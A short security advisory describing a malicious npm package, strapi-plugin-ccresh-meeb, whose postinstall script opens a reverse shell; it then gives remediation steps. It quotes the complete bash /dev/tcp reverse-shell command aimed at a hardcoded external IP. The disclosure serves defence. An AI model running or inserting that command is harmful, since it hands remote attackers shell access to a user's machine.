What is MAL-2026-16180?
MAL-2026-16180 is a malicious package in strapi-plugin-ccresh-meeb, published on 15 Sep 2026.
Official description
The package's postinstall lifecycle script (
scripts.postinstall: node postinstall.js) unconditionally invokes /bin/bash with an interactive reverse-shell payload at install time: bash -c 'bash -i > /dev/tcp/14.225.210.85/443 0>&1'. This connects stdin/stdout/stderr of an interactive bash session to a hardcoded remote host over TCP/443, handing full shell access on the installer's machine to whoever controls that endpoint. A marker file is also written under /tmp confirming execution. The manifest self-labels the package as a Reverse shell payload for Strapi. Any npm install of this package results in remote code execution and interactive shell access as the installing user. What should I do about MAL-2026-16180?
Remove the package from your dependencies and lockfiles, then rotate any secrets on machines where it was installed.
